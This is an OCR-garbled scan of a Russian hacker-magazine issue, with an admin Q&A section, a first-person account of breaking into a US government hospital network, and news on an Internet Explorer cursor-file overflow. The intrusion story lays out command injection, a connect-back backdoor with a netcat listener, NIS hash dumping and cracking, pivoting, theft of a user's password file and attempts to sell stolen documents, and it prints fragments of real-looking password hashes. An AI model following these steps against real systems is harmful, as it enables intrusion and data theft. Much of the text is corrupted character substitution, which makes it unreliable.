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Сети оплетают здания 
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Гпоод готов для лучшей битвы сезон 
в'марте ты сможешь найти ѴѴі-Рі сиги, 

и взломать любую заи№1 

Выйди из дома и найди важные хон 

- СТи Зпіскегз» открывают акцию 

дай сам за себя. Против сервера 
^ Победитель вырвет из наших рук 

иоопппченный моддерский ноутбук 










ф Очень странная ситуация. Мой компьютер не 




Ф 



выключается по команде збиМоѵѵп -б поѵѵ. Я 
пробовал в Сепіоо Шпих и в ОрепВЗО. Какие 
действия можно предпринять? 

Возможно, твоя материнская плата либо не поддерживает, либо 
криво поддерживает АСРІ. Хотя есть еще вариант, что при 
конфигурировании ядра ты отключил опции: 



Ядро ветки 2.4: бепегаі Зеіир --> АСРІ Зиррогі --> [х] АСРІ Зиррогі 

Ядро ветки 2.6: Роѵѵег Мападетепі орііопз (АСРІ, АРМ) --> АСРІ (Абѵапсесі СопЛдигаііоп апб 

Роѵѵег ІпМасе) Зиррогі --> [х] АСРІ Зиррогі 

Также проверь, запущен ли демон асрісі. Что касается ОрепВЗО, то в этой 
операционке до сих пор нет поддержки АСРІ. Поэтому чтобы выключить 
компьютер, попробуй за счет модификации значения переменной 
тасІісІер.артІіаК активировать специальный Паск: 



Ф 

Ф 



Будь конкретный и задавай конкретные воп- 
росы! Старайся офориить свою проблему 
иаксииапьно детально перед посыпкой в 
НасНПО. Только так ны сиожем действи- 
тельно помочь тебе ответом, указать на воз- 
можные ошибки. Остерегайся общих вопросов 
типа «Как взломать интернет?», ты лишь пот- 
ратишь наш почтовый трафик. Рассчитывать 
на хапяву (инет, шеллы, карты] не стоит, мы 
сами живем на гуманитарной помощи. 



Китайские спамеры каждый день забрасыва- 
ют мой мэйлбокс рекламой. Рыдаю. 



Да, это насущный вопрос. Как вариант, на сервере можно вместо 
дефолтного агента локальной доставки таіі/таіі.іосаі использовать ША 
с возможностью фильтрации почтовых сообщений (ргостаіі, таіібгор, беііѵег). 
В приведенном ниже примере все письма с кодировками наших восточных 
друзей немедленно отправляются в трэш: 



# зузсіі тасІкІер.арпіЫИ # ѵі /еіс/ргостаіігс 

# зПиібоѵѵп -Пр поѵѵ 

: 0 : 



Ф Очень часто в документации и статьях 
встречается термин сбгооі Подскажи, что 
он означает. 



*1 Л 0 л Ѵ5иЬіесі:.*=\?(.*Ыд5|І5О-г02г-)р|І50-20гг-КК|еис-кг|дЬ2312|к5_с_5601-1987)\? 

*Г0 л ѴСопіеп(-Туре:.*сІіаг$еІ="(.*І)ід5|І5О-2022-]р|І$0-2022-К[і|еііс-кг|дІ)2312|к$_с_5601-1987) 

Меѵ/пиІІ 

Для таіісігор правило будет выглядеть следующим образом: 



С помощью сПгооІ для конкретного процесса можно изменить 
представление файловой системы. Каталог, который на самом деле 
является обычным каталогом в файловой системе, становится для демона 
корневым, таким образом обеспечивается дополнительный уровень защи- 
ты и снижается возможный ущерб при взломе сервиса. Для того чтобы 
программа заработала в ограниченной среде, необходимо скомпилировать 
ее статически либо поместить все необходимые для корректной работы 
разделяемые библиотеки в фейковую структуру каталогов. Важно отме- 
тить, что сіігооі имеет смысл использовать только для демонов, запускае- 
мых от имени непривилегированного пользователя, так как существуют пу- 
ти, позволяющие руту выбраться из сИгооІ'ной песочницы. 



# ѵі /еіс/таіібгоргс 

В0биЗ="(Ыд5|ізо-2022-Ір|І50-2022-КР|еис-кг|дЬ2312|кз_с_560М987)" 

\\ ((/ Л Соп(епНуре:.*сІшеНВ06У$Л || \ 

(/ л Сопіепі-Туре:*тиШраг(/ && \ 

/ л СопіепМуре:.* л ?.*сІіаг$еі=$В061І5/:Ь)) 

{ 

Іо Меѵ/пиІІ 

} 

Чтобы заблокировать мессаджи на арабском, фарси и урду (привет пакиста- 
нским спамерам), добавь в перечисление кодировку ѵѵіпсіоѵѵз-і 256. 

Ф Нужно настроить еженедельный бэкап в виндо- 
вой сети, где я админю. Можно ли разрешить 
доступ к Ьаскир-диску только соответствующей 

(п) 

у у Большинство Ьаскир-прог, вроде известной Ѵегііаз Васкир Ехес 

(ѵѵѵѵѵѵ.ѵегНаз.сот), требует админского доступа к системе. Для бэкапной 
проги можно создать отдельный админ-аккаунт в Асйѵе Рігесіогу. Аккаунт будет 
непростой, хоть и не золотой, - только для него будет открыт доступ на твой 
Ьаскир-диск. 





Что такое М8С? 



Я поддерживаю сервачок в небольшой локалке. 
Есть интерес отслеживать сайты, которые посе- 
щают мои пользователи. Тачка, которая работа- 
ет в качестве шлюза, довольно медленная, с 
небольшим количеством ОЗУ, поэтому бкрсі на 
нее не поставишь, соответственно, парсеры ло- 
гов типа Загд или Саіатагіз не помогут. Что 
можно предпринять в данном случае? 



Странные у вас интересы, я вам скажу, молодой человек. Ок, если 
трюк с прозрачным кэширующим прокси-сервером тебе не подходит, 
посмотри в сторону РІМЗ, а если быть точнее, в сторону подсистемы журнали- 



МісгозоЙ Сотгтюп Сопзоіе РоситепТ Это исполняемый документ, 
который запускается из командной строки сплсі (Пип-меню). Рассмот- 
рим ключевые компоненты системы, чья жизнедеятельность основывается на 
Пизе. Сотртдплітзс вызывает консоль Соплриіег МападетепІ, которая уже со- 
держит остальные консольные документы. Різктдплітзс дает быстрый доступ 
к параметрам диска, которые здесь же могут быть изменены. Реѵтдтітзс, 
как ясно из названия, вызывает Реѵісе Мападег («Диспетчер устройств»), кото- 
рый внешним видом очень близок к старому 9х. РТгд.плзс - встроенный деф- 
рагментатор диска. Еѵепіѵѵѵг.тзс наведет на «Журнал событий». Зегѵісез.тзс 
выдает листинг всех вписанных сервисов, работа с этим документом требует 
особой осторожности. 



рования пакета ВІШ. Прописывай в конфигурационный файл паплесІ.сопТ сле- 
дующие директивы: 

Іоддіпд { 



Ф С ѴѴМ 1 все давно знакомы, а вот что такое 0М2, 
нигде не могу найти ответа. 



сііаппеі диегіез_сІі { 

Ше "/ѵаг/Іод/диегіез.Іод" ѵегзіопз 5 зіге 1024к; II лог-файл, количество ротаций и его размер 

зеѵегііу іп(о; II уровень журналирования 

ргіпі-саіедогу уез; II метка с категорией 

ргіпі-зеѵегііу уез; II метка с уровнем журналирования 

ргіпНіте уез; II временная отметка 

}; 

саіедогу циегіез { чиегіез_сІі; }; II помещаем клиентские запросы в лог 

}; 

После сохранения внесенных изменений отправь демону патесі сигнал 
ЗІСНІІР ("гпсіс геіоасі" для ВІШ 9, "кіІІ -НІІР 'са* /ѵаг/гип/патесІ.рісГ для ста- 
рых версий). С этого момента необходимая тебе информация будет методич- 
но заноситься в файл /ѵаг/Іод/диегіез.Іод: 

27-Рес-2004 02:02:37.553 диегіез: Ш: сііепі 192.168.1.2И1218: диету: орепЫ.огд Ш А + 

Ф Как можно скачать все аѵі-файлы с определен- 
ной ѵѵеЬ-страницы? 

(Ё) 

у Ну Даже не буду спрашивать, зачем тебе такое понадобилось ;-), 

просто скажу, что для решения этой задачи лучше всего заюзать ѵѵдеі: 

$ ѵѵдеі -г -с -А .аѵі -1 1 1ііір://шѵѵ.0с1ау.ргіѵаіеѵіс1ео.сот/ 



Ф 



ОШ не имеет никакого отношения к системе ѴѴеЬплопеу. ОШ - это 
аббревиатура от «демилитаризованная зона», другими словами, 
граничная сеть. Этот момент лучше объяснить на примере. Как правило, в 
крупных организациях или компаниях, уделяющих большое внимание 
безопасности, для общедоступных серверов (СѴ5, ОШ, РТР, МаіІ, ѴѴеЬ) 
выделяют собственную подсеть, находящуюся между двумя файрволами: 

О внешний сетевой интерфейс первого Тѵѵ соединяется с интернетом; 

О внутренний ифейс первого Ьы подключен к ОШ] 

О внешний ифейс второго й/ѵ также подключен к РМ2; 

О внутренний ифейс второго Тѵѵ принадлежит локальной сети, в которой 
находятся клиентские компьютеры организации. 



\Ц^ Можно ли установить всем юзерам захвачен- 
ной ІЧТ-сети выбранный мной ѵѵаІІрарег, да так, 
чтобы никто не смог его поменять? 



Ф 



Одно из решений касается ОРО (Огоир Роіісу ОЬіесі). Топаем в ОРО 
-> ІІзег СопТідигаІіоп -> Асіпліпізігайѵе Тетріаіез -> РезкТор -> Асііѵе 
Резкіор -> Асйѵе Резкіор ШІрарег, включаем опцию и выбираем нужные 
обои. Затем в С:\Роситеп4з апсі ЗейіпдзѴ'изегпате" піизег.сіаі следует 
переименовать в пйтзег.тап. Также можно задействовать многострадальный 
реестр, предварительно создав файл со следующим содержимым: 



Рассмотрим более сложный пример, но уже из другой области. Допустим, тебе 
необходимо скачать все файлы (кроме сІеЬидіпТо) с расширением грш, тогда 
выполняй команду: 

$ ѵѵдеі -г -с -1 1 -А грш -8 ЧеЬидіпй)* Іііір:/Ла$і.тіггог.огд/арШе(ІогаЛсЗ/і386/КРМ$/ 



КЕ6Е0ІТ4 

[НКЕѴШеШЕК\СопігоІ РапеМезкЕор] 

,, Ш11рарег"= ,, ШШ00Ш\\1одо.Ьтр м 

Сохраняем текст как ѵѵаіірарег.гед и затем слегка переписываем Іодоп-скрипт: 






каждого хакера есть мечта. Один хочет спионерить базу с кредитками на лимон долларов, другой - дефейснуть сайт ИісюзоК. Я же нес- 
колько лет стремился взлпмать крупный сайт в зоне дпѵ. Не знаю плчему, на правительственные сайты всегда вызывали у меня боль- 
шой интерес. И ват, спустя долгий промежуток времени, моя мечта успешна лсуществипась. 



■ МазІеМате-тазІег 




РЕППЬНЫЕ ИСТОРИИ ХПКЕРСКИХ ЗЛОДЕЯНИЙ 



к. 




З амутить сайт в зоне доѵ очень 
сложно. Подобные проекты 
могут содержать только серь- 
езные государственные объе- 
динения. Соответственно, с 
таких ресурсов можно поднять 
очень ценную информацию, а 
затем продать ее за большие 
деньги. Правда, сломать подобный объект 
очень сложно, так как за ними следят про- 
фессиональные администраторы. Но «слож- 
но» не означает «невозможно» - несколько 
месяцев назад мне удалось проникнуть в на- 
циональный госпиталь ІІЗА. 



А РОЗ ОШИБКИ, ДВО ОШИБКИ 

Признаюсь, что взлом не обошелся без по- 
мощи моего хорошего товарища. Все нача- 
лось с того, что поздним вечером мне на е- 
таіі свалилось интересное письмо. В нем 
друг радостно повествовал о том, что он на- 
писал продвинутый СОІ-сканер и взломал 
с его помощью несколько сайтов. В списке 
присутствовал проект Шр://агсІііѵе.пІт.піІі.доѵ. Ес- 
ли бы проект не был государственным, я бы 
даже не обратил внимания на ссылку, однако 
сайт даже на домене четвертого уровня мог 
быть очень и очень привлекательным. 



Я отписал ему ответ, в котором попросил 
дать мне полное описание бага, фигурирую- 
щего на этом сайте. Позже выяснилось, что 
ошибка в скрипте проявлялась из-за невни- 
мательности администратора или автора 
сценария. Я не буду описывать техническую 
часть бреши, потому что уже много раз пи- 
сал о ѴѴѴШ-изъянах и изрядно задолбал всех 
этими багами :). Тебе важно знать, что если 
сценарий получит параметр ітаде, то он рас- 
ценит его значение как команду. Прежде чем 
рассказывать о моих дальнейших действиях, 
я напишу лирическое отступление, посвя- 
щенное защите государственных проектов. 
Стратегические сайты охраняются с особой 
тщательностью, чтобы, не дай Бог, какой-ни- 
будь хакер не вторгся на секретную террито- 
рию. Обычно на серверы ставят только свежие 
версии операционок и используют хорошо 
настроенный файрвол, причем частенько файр 
находится не на самом сервере, а на внешнем 
роутере. Так было и в моей ситуации. Какой-то 
маршрутизатор старательно резал пакеты, 
позволяя прицепиться лишь на 21 и 22 порт 
машины. Чуть позже я определил версию сис- 
темы - это была девятая солярка, под которую 
практически нет рабочих эксплойтов. 



А ОПЕРОЦИЯ «ПРОНИКНОВЕНИЕ» 

Первое, что я сделал, - заюзал анонимный 
проксик и зашел на главную страницу какого- 
то подразделения государственного госпита- 
ля. Затем обратился к бажному скрипту, пе- 
редав ему параметр ітаде=1з. В самом конце 
вернувшегося контента красовался листинг 
каталога. Далее я определил операционную 
систему и просмотрел список активных юзе- 
ров. В Штатах в то время было раннее утро, 
поэтому все админы крепко спали :). 

В солярке, естественно, отсутствовал ще\, 
но по многолетнему опыту я уже знал, что в 
системе существует скрипт СЕТ, позволяю- 
щий выкачивать файл из любой точки мира. 
Из-за того что файрвол блокировал практи- 
чески все входящие соединения, я восполь- 
зовался соппЬаск-бэкдором сЬб. Он сам кон- 
нектится на нужный узел и выполняет любую 
команду. Я бережно залил его на удаленный 
сервер, затем проверил наличие компилято- 
ра и попытался собрать бинарник. Но, увы, у 
меня этого сделать не получилось. Сначала в 
моей голове промелькнула мысль о том, что 
злой админ запретил всем юзать дсс. Но мои 
сомнения развеялись, когда я закачал прос- 
тенький сишный файл. Он скомпилился безо 
всяких осложнений. Далее мне пришла в го- 
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лову еще одна идея: прицепиться на какой- 
нибудь солярный шелл и попробовать соб- 
рать сЬб там. Порывшись в списке паролей 
на захваченные серверы, я нашел аккаунт на 
какую-то примитивную университетскую са- 
ноську. Сервер без лишних возмущений при- 
нял пароль и пустил меня внутрь. На этой ма- 
шине отсутствовал не только ѵѵдеі, но и СЕТ, 
поэтому мне пришлось транспортировать код 
бэкдора через буфер обмена. Когда сЬб был 
залит, я выполнил запрос дсс сЬб.с -о сЬб и 
был послан на три буквы :). Компилятор вы- 
ругался на отсутствие функций іпеіасісіг, 
зоскеі и т.п. Только тогда до меня доперло, 
что убогая 8ипОЗ по умолчанию не подключа- 
ет сетевые библиотеки. Стоило мне приба- 
вить парочку включений типа -Ізоскеі -ІпзІ, 
как бинарник сразу же скомпилился. 



Реализовав подобный финт на государствен- 
ном проекте, я получил рабочий соппЬаск- 
бэкдор. Теперь мне нужно было найти шелл, 
не фильтрующий соединения с портами и на- 
ходящийся где-нибудь далеко :). Подобный 
сервер был найден довольно быстро. Я уста- 
новил на машину пеісаі и запустил его следу- 
ющим образом: 

пс -I -р 4000 

где 4000 - порт, в который должен стукнуться 
продвинутый бэкдор. С первого раза бэкдор 
не сумел соединиться с моим сервером, по- 
тому что вместо ІР-адреса я использовал 
Ііозіпате. Но со второй попытки все разрули- 
лось - в консоли зарисовалась надпись 
«СоппесіесІ іо соттапсі Ііпе» и я получил дос- 
туп к государственному интерпретатору :). 




ЧТО ПОМОГЛО МНЕ ПРИ ВЗПОИЕ? 



О Команда урсаі позволяет увидеть зашифрованные пароли се- 
тевых пользователей. Именно благодаря этому я сумел посе- 
тить другие локальные серверы. 

О Иногда полезно скомпилить хакерскую утилиту на доверен- 
ном сервере, посмотреть, на что ругается компилятор, и только 
потом собирать сишник на объекте для хакерских действий. 

Ѳ Администратор выследил меня из-за того, что я запустил ло- 
кальный брутфорс для проверки на простые пароли. Никогда не 
делай этого :). 









С одной стороны, взлом стратегического 
проекта может принести много полезной ин- 
фы и денег, но с другой - на сервере с 
поЬосІу-правами особо не разгуляться. Я то- 
же так думал, поэтому на удачу особенно не 
рассчитывал :). К тому же, мне было извест- 
но, что к девятой соляре нет универсальных 
эксплойтов. То есть они имеются, но только 
для специфического софта. Глянув Іазі, я по- 
нял, что сервер посещает много юзеров. 
Только за один день на машину залогинилось 
порядка двадцати разных пользователей. Бы- 
ло решено провести локальную проверку на 
нестойкие пароли. Как полагается, я выпол- 
нил команду дгер зМ /еіс/раззѵѵфиі -б: -И , 
чтобы вывести все рабочие логины. Но не 
тут-то было - на серваке не было аккаунтов, 
под которыми входили в систему. Точнее, из 
хороших учетных записей я узрел только две: 
гооі и тузці. Наверняка, у аккаунта СУБД да- 
же был запрет на установку пароля. Но тогда 
возникал вопрос: откуда взялись многочис- 
ленные пользователи, которых не было в 
/еіс/раззѵѵсі? Ответ очевиден: этот сервер 



включался в сетевой домен. 

Проверить наличие домена можно командой бі 
-Ь. Ее вывод показывал, что в домене сущест- 
вовал нехилый кластерок, общим объемом в 
один терабайт. Ты представляешь, сколько 
данных лежит на этом сервере? Я тоже нет :). 

Я уже сталкивался с доменом в ЗипОЗ, поэто- 
му знаю об одной интересной команде под 
названием урсаі Она позволяет получить ин- 
формацию с главного контроллера домена. 
Сейчас меня интересовал список сетевых 
пользователей, который можно легко получить 
с помощью запроса урсаі раззѵѵб. Эту команду 
вправе выполнить любой юзер, даже с мизер- 
ными привилегиями. Самое интересное, что 
помимо логина покажется и пароль пользова- 
теля, зашифрованный методом йЕЗ. 

Через пару секунд я получил списочек, сос- 
тоящий из 258 различных аккаунтов. Думаю, 
понятно, что вывод команды занял несколько 
окон терминала. Транспортировать аккаунты 
через Сеть не представлялось возможным - 
это неудобно и небезопасно, поэтому я вклю- 



чил опцию «І-оддіпд ргіпіаЫе оиіриі» в моем 
любимом ззЬ-клиенте (я имею в виду РиТТѴ). 
Затем пару раз выполнил запрос рз -еТ, что- 
бы переполнить буфер и слить лог в тексто- 
вый файл. Далее, как ты уже понял, я скопи- 
ровал информацию о клиентах в папку с ЭоГіп 
ТГіе Віррег’ом. Уже после расшифровки зіп- 
діе-методом я получил рабочий пароль сете- 
вого юзера. С этого момента меня ждали 
удивительные открытия. 

Л СЕРВЕРНЫЕ ПУТЕШЕСТВИЯ 

Теперь, когда у меня был доступ к доменно- 
му аккаунту, теоретически я мог подконнек- 
титься к любой машине, входящей в домен. 
Однако определить это дело можно только 
подключением по ЗЗН. Я успешно зашел по 
открытому 22 порту на взломанный сервер, 
а затем глянул в /еіс/Ьозіз. Там мне довелось 
увидеть еще один адрес, имеющий символи- 
ческое имя тЬопе. Кстати говоря, на эту ма- 
шину извне так просто не пускало. Но, ис- 
пользовав сетку сервера агсЬіѵе, я без труда 
подключился к тЬопе. Как и следовало ожи- 
дать, сетевого пользователя впустило на ма- 
шину. Сервер находился под управлением 
ЗипОЗ 5.8. Коренное отличие от предыдущей 
машины прослеживалось в сетевых свой- 
ствах. В компьютере находились целых три 
сетевых интерфейса, и я поспешил этим вос- 
пользоваться :). 

Чуть позже я выяснил, что тЬопе выступает в 
качестве Ргітагу Оотаіп СопігоІІег. Соответ- 
ственно, все домашние каталоги должны на- 
ходиться именно на этой машине. Мне не 
потребовалось особого труда, чтобы их най- 
ти, - директории находились в /Ноте. Но 
просмотреть их содержимое мне не удава- 
лось - не хватало прав :(. Из двух сотен па- 
пок лишь 20 удавалось прочитать. В них я не 



а Не стоит забы- 
вать, что все 
действия хакера 
противозаконны, 
поэтому данная 
статья дана лишь 
для ознакомления 
и организации пра- 
вильной защиты с 
твоей стороны. За 
применение мате- 
риала в незаконных 
целях, автор и ре- 
дакция ответствен- 
ности не несут. 



штоогиіі : / у^ѵ4ПУгй^ихд: -: і.:і 4 : ^ іи : подпиі ічоогиііап, сдиь зсиаепс : / поше/гйпоогии : /ді 
п/сзіі 

І іЪасЯпііп: ІіЗехЫд . ОРгіхзс : 308 : 22 1 : ЛТ зегѵісе асЯпііп ассоипі: 
іп/сзіі 

ірепд: пЕНЬУгТроЬ87д: 374 : 2 18 : 2епдіит Репд, СдЗЕ зъигіепо : /Ііоте/ грепд: /Ьіп/сзіі 
і-ітогп: рѵУІТГ дѲоеЫЗд: 230 : 3 12 : Кагеп ТЪогп, Соішіегсе Опе/ІШЬЗКЗ : /^опіе/ъііогп: /Ьіп/сз 
ь 



Іоапе : 0Аз±34ХЪ0(ИК<Э: 5024 :30б : Ри 
ІееЪ : еЕ1Ыі2крК5шіс : 373 : 2 16 : Віаі 
ргоіііез : ЕісЪЬ.р5№Эі:42пгз : 888 : 2 18 : 
а 

МиярЬгеу : ІЬіІі/ЗоТзАВТІІ: 48 6 : 211:: 
эгъ/Ьопж/ЪшйрЬгеу : /Ьіп/ ъсзЬ 
аскегпіап: ^ІЪРс . ѵІтхОи. : 2 13 : 2 13 : ! 
: /Ъіп/ссзЪ 

тзітуар : ЬчкНз9 і Еа2 6дА : 3 3 7 : 2 18 : V 
ар : /Ьіп/сзіі 

эпеііі : 1п5СМГ0аНН54о :701 : 275 : Ра- 
іеекіп: ЗЕІТ4Н188В]ікуУ : 236 : 2 18 : а а: 
'□псіог : 31гЪ2у<11:ЁШЗИз :831:299:3с; 
: /Ъіп/с зЪ. 

лгеЪег : 4 з егЗ 6М01Б5ТГ : 830 : 243 :Ыог1 
э і 11 :±и/ѴЬТХдууІЕМ:3 28:286:11111 



СдЗЕ : /ѣоте/ з іъасітіп: /Ь 
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Саіедогу: 





’иЫісаІіопв 



Таік діѵс 



АЬ«гэе* 



- Зе$$іоп 

І_оддіпд 

- Т егтіпаі 

КеуЬоагб 

ВеІІ 

Реаіигез 

- Ѵ/іпбом 

Арреагапсе 
ВеНаѵіоиг 
Т гапгіаііоп 
Зеіесііоп 
Соіоигг 
Соппесііоп 



Орііопг сопігоіііпд 5655І0П Іоддіпд 



Зе$$іоп Іоддіпд: 

^ Боддіпд Іигпесі оК сотріеіеіу 
Бод ргіпІаЫе оиіриі опіу 
Бод аІІ 5Ѳ55ІОП оиіриі 
^ Бод ЗЗН раскеі сіаіа 
Бод ПІе пате: 

[рай 

(Бод N16 пате сап сопіаіп &Ѵ, Ш , Ш Ьг сіаіе.. &Т Жг 
Ііппе, апб Ш Жг Гю$1 пате) 

\А/каІ I о сіо \\ Же Іод Іііе аігеабу енІ5І$: 

^ АІшауг оѵегшгііе іі 

АІшауз аррепб Іо Же епсі о і іі 
* А$к Же изег еѵегу Ііте 



Вгоше... 



□ рМопз зресіііс Іо ЗЗН раскеі Іоддіпд 
■1^ Отіі кпошп разшогб ІіеІб$ 

І ГІГѴ-.ІІ- І ГІаГд 



Как много юзеров хороших... 
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вторжение в госпиталь 



К НИИ НУЖЕН ОСОБЫЙ ПОДХОД 



Я уже писал про взлом ЗипОЗ в статье «Смертельный 
эксплойт». Прочитав оба материала, ты наверняка понял, что 
солярка отличается по возможностям от Ыпих. На ней сложнее 
собирать сишные файлы и работать в консоли. Даже команда 
отображения процессов выглядит нестандартно: рз -еі. Для того 
чтобы почистить логи, нельзя применять известный клинер ѵап- 
ізИ2. Для этого дела существуют свои утилиты, например гар. 
Соответственно, и руткиты для Зоіагіз специфические. Но не со- 
ветую ставить гооІкііЗипОЗ на последний релиз солярки - в 
этом случае ты пропалишь себя с потрохами :). Если у тебя воз- 
никнут вопросы по ЗипОЗ - пиши, я постараюсь ответить. Бла- 
го, мне доводилось проводить много часов в консоли этой не 
совсем стандартной оси. 



■АаѣіпкргІ.цкЯЫі^ЪЛі-тЛ’' ІІ’і ІИ Ці|М.І Иішіцир СІИ ■іаііітэі к: і иг ілт : *і 
ВД і Г ■ I Н НП 

■ I Ь а*:! 1Р МШГ Ч-э «ті - і І1 1 Ри» г асѣ О ■і ііі, 4ГП. ІН.І ііш гкші ею - 
|уцьі ь> і кИ-4рі.Мйк*|'І і рН а | Ц >4НРІ ЙИІІІЙі 'ЩЧ- #яЧ4Н Чі 

іимі іііиіні -я>і і лнімииы# ш г *тт±ыл ыг 1 — ■— шііь 
вру- 

+ 1 ев Э рв-КЧІ" !П і ИФі л Ф ■ а іігі " №^1. ^ бж чіяі і па -ас 

в і ! і гхи- ѴІ-ГМТѴЬ-^І- ЫЯі^НаІф1.ЬФШ ЯРІ# -■ — — -| ;■ , ыави'Ь і і . 1 в. Еляук 

га-*" гі г,- Ьовп ч> 

й 

■ І-И івц-і іі МС нис^г 

I 

ІГТ-ІШ-Іі ІВВІЫІ 

пи.м .ьс .іі міый шрм4 

І-ЬІ . И ■ М Ч ни» 

ІРІ Іі .И .ш ѵш 

ІЮ. ІЙ . Іі . 91.1 нм на.аМ. вэсЬ ирг* 

МП 

ввѵеіМшіі вйксвііі пан Ыр.| 1 .и.р -і 

МнИ і№ , іі! «к. Н і рмьНі 

1 ЛГТ І№із Ткв Ін М ЫпІНчНТ 1 ІИ Сан Мна.шарі 

ЙвИММЫ М I 

Ч ■■■ *■ ! 8 ’ ‘«I 4 і "!■ 1 I.: .ГШГ* 

■МНІ I 



на вт 



МЬопе принимает гостей 



нашел полезной информации - в основном 
один мусор и какие-то непонятные конфиги. 
После такого облома я вспомнил, что суще- 
ствуют и локальные домашние папки, кото- 
рые очень часто может прочитать рядовой 
пользователь. Их местонахождение - 
/ехроіІ/Иоте/изегз. Действительно, в этом 
каталоге я нашел три локальные папки. В од- 
ной из них обнаружился очень занятный 84- 
килобайтный файлик ІіозІз.М. Его содержа- 
ние повергло меня в шок - в нем находились 



все айпишники центральной больнички. По 
скромным прикидкам адресов было чуть 
больше пятисот. Но далеко не каждая маши- 
на отвечала на есііо-запрос. Короче говоря, 
благодаря этому списку я нашел еще пять 
солярок, на которые можно было войти. На 
этих машинах находились несколько интерес- 
ных документов по внутренним медицинским 
проектам, которые я до сих пор пытаюсь 
продать (пока что безуспешно ;)). Что касает- 
ся безопасности, то тут не к чему было при- 



копаться - ни один .Мзіогу файл не читался, 
а в конфигах не было паролей в чистом виде. 
Поднять права с помощью эксплойта мне то- 
же никак не удавалось. 

А БОГОТЕНЬКИЙ ЮЗВЕРЬ 

Через пару дней я заметил одну интересную 
особенность. Если на машине агсИіѵе (или на 
любом другом сервере, входящем в домен) 
висит активный пользователь, то права к его 
домашнему каталогу становятся равными 
755. Как я уже писал, сетевая директория 
монтируется в /Йоте. После того как я под- 
метил этот факт, мне захотелось порыться в 
домашних папках. Как только в систему вхо- 
дил какой-нибудь пользователь, я переходил 
в каталог и смотрел его содержимое. Как 
правило, в папке не было ничего, кроме му- 
сора... Так происходило до тех пор, пока на 
сервер не зашел чувак под логином тЬорТ 
В его домашнем каталоге находилась папка 
Ітр. А в ней мне посчастливилось найти фай- 
лы баіаі .М и (№2.М, в которых лежали... 
пароли. Скажи мне по секрету, тебе никогда 
не доводилось записывать сложный пассворд 
в текстовый файл? Наверняка, было такое 
дело :). Этот пользователь также страдал 
склерозом, поэтому оформил удобочитаемый 
текстовик, включающий в себе аж тридцать 
паролей на различные ресурсы. Тут был и 
РауРаІ, и какая-то корпоративная база зна- 
ний, и, конечно же, пароли на ГТР/85Н-ре- 
сурсы :). Почти все аккаунты записывались в 
ріаіп \ех\, но были случаи, когда вместо разз- 
ѵѵогсі встречалось слово «погтаі». Уже через 
несколько минут я определил «нормальный» 
пароль богатого америкоса ;). 

Благодаря этому файлу я смог залогиниться 
на несколько локальных серверов, не входя- 
щих в домен. На них был установлен І_іпих, 
а сами машины обслуживали совсем другое 
подразделение. Надо сказать, что на них ца- 
рил ужасный беспорядок. Я нашел рутовый 
пароль в первом же Мзіогу ламернутого ад- 
министратора. Этот пассворд совпадал с 
ключевым словом на машине тЬопе. К концу 
дня у меня уже было четыре рутовых доступа 
в локальной сети доѵ :). 

А ТРК ИНОГО ОДИИНОВ ХОРОШИХ.. 

Я так увлекся взломом, что совсем забыл о 
собственной безопасности. Естественно, что 
я порядочно наследил на многих машинах. 
Это увидели тамошние админы и поменяли 
рутовые пароли. Спустя пару дней мне прик- 
рыли доступ и на солярные сервера. Однако 
с помощью повторной расшифровки паролей 
по увесистому словарику я получил еще три 
сетевых аккаунта. Одним из них я воспользо- 
вался без промедления и закрепил свои пра- 
ва на машине. Кстати, администраторы даже 
не пропарсили ШѴѴ-логи и не закрыли баг в 
РНР-скрипте. Меня вообще удивляет тот 
факт, что сисадмины борются не с причиной, 
а со следствием. Именно это и позволяет ха- 
керам взламывать стратегические серверы 
снова и снова. ЗС 





Мизерная часть козырных аккаунтов 




л Все хакерские 
тулзы, описывае- 
мые в этом мате- 
риале, ты можешь 
найти на 

МІр://раскеІ5іогт- 

зесигііу.пі. 



■Ж" 

л На компакте ты 
найдешь поучи- 
тельный видеоу- 
рок, дублирующий 
этот интересный 
взлом. 





ШТЕШТ ЕХРЮВЕВ ВІНЕМТ.ЕІЕ ІІ8ЕИВ ІІМП ^ 

СЦВ80В РВ0СЕ83Ш6 ВЕМОТЕ I Ш8ЕВТ ВОСЕ иШМЕВОВНІТѴ 



описяние: 



Недавно мир узнал о новых уязвимостях в брау- 
зере Іпіегпеі Ехріогег 6.0. На этот раз очередное 
переполнение позволяет перезагрузить опера- 
ционную систему и, в теории, выполнить любой 
код. Подробности ошибки не разглашаются, од- 
нако известно, что переполнение буфера вызы- 
вается при обработке неправильного *.апі-фай- 
ла. Анимашка в нашем случае - это файл курсо- 
ра, который умеет подгружать глупый ослик. 
Внедрение сокрушительного РоЗ’ера в МплІ- 
файл происходит с помощью конструкции Ьосіу 
{СНР50Р: игІ("АМІВШЕ.апі")}. Сам АМІВШЕ.апі, 
как правило, находится в той же папке. Как ты 
догадался, эта конструкция - описание стиля 
НТМЬдокумента. 

Помимо глупой РоЗ-атаки, существует возмож- 
ность выполнить любой код с правами текущего 
пользователя - на данный момент есть эксплойт, 
который открывает шелл на 28876 порту. Однако 
поставляемая версия пока не работоспособна, 
поэтому придется немного повременить. 



защита: 



Представь, ты серфишь бесконечные страницы 
интернета, и твой комп внезапно перезагружает- 
ся. Или еще хуже, на машину заливается троян, 
отсылающий все твои пароли. Как-то не приколь- 
но, да? Чтобы не стать случайной жертвой хаке- 
ров, рекомендую установить второй сервис-пак к 
ѴѴіпХР либо специальный хотфикс к ѴѴіп2к/2003. 



ССЫПКИ: 



Ссылки на все вышеперечисленные эксплойты 
находятся здесь: ѵѵѵѵѵѵ.хЕосиз.пеі/ЛазІізку/ісоЕхр. Будь 
осторожен при тестировании уязвимости - не 
исключено, что твой компьютер перезагрузится 
:)■ 



злоключение: 



Если верить багтраку, то уязвимыми считаются 
следующие системы: ѴѴіпМЕ, ѴѴіпХР+ЗРІ, 
\Л/іп2к+5Р4, ѴѴіп2003. Поспеши обновить свою 
систему, если она содержит злосчастный баг. 
Либо выбери для себя другой браузер, напри- 
мер МуІЕ или Орега. 



ВВЕЕТЗ: 



Информация об уязвимостях была выложена не- 
ким РІазЬзку. Пожелаем ему дальнейших успехов 
в изучении кода бажного осла. 




описоние: 



Вспомни, как замечательно было год назад. 
Взломал ты, скажем, какой-нибудь Шпих-сервер 
через дырявый РНР-скрипт и без труда поднял 
свои права. И все благодаря эксплойтам для 
ядерных функций типгетарО и р{гасе(). Сейчас 
эти уязвимости безбожно устарели - админы ус- 
танавливают новые ядра либо патчат старые. 
Однако не все так плохо. В конце декабря хаке- 
